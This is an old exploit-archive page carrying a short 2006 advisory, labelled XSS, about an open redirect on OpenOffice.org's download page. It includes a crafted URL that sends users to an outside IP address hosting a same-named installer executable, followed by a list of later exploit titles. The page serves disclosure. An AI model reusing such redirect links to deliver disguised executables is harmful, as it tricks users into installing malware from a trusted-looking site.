exploits , vulnerabilities , articles , OpenOffice.org XSS

2006-06-14

OpenOffice.org XSS

Author:    XiON
Date:      JUN1406
Type:      XSS
Product:   http://www.openoffice.org/
Patch:     N/A


Straight URL (From INDIANA U Mirror):
http://download.openoffice.org/2.0.2/contribute.html?continue=ftp%3A//ftp.ussg.iu.edu/pub/openoffice/stable/2.0.2/OOo_2.0.2_Win32Intel_install_wJRE.exe

Redirected URL:
http://download.openoffice.org/2.0.2/contribute.html?continue=http://216.66.19.100/~clockwo/OpenOffice/OOo_2.0.2_Win32Intel_install_wJRE.exe

Note: the file names are the same, 
so an unsuspecting user will hot continue on the download page,
and inadvertently download an unwanted and potentially dangerous file from
what appears to be a reliable website.

securitydot.net - 2006-06-14

Exploits - newest 10 RSS | More

2007-06-15 37870 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 19658 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23377 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 19695 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12098 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10287 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12483 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10358 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22335 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 10850 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit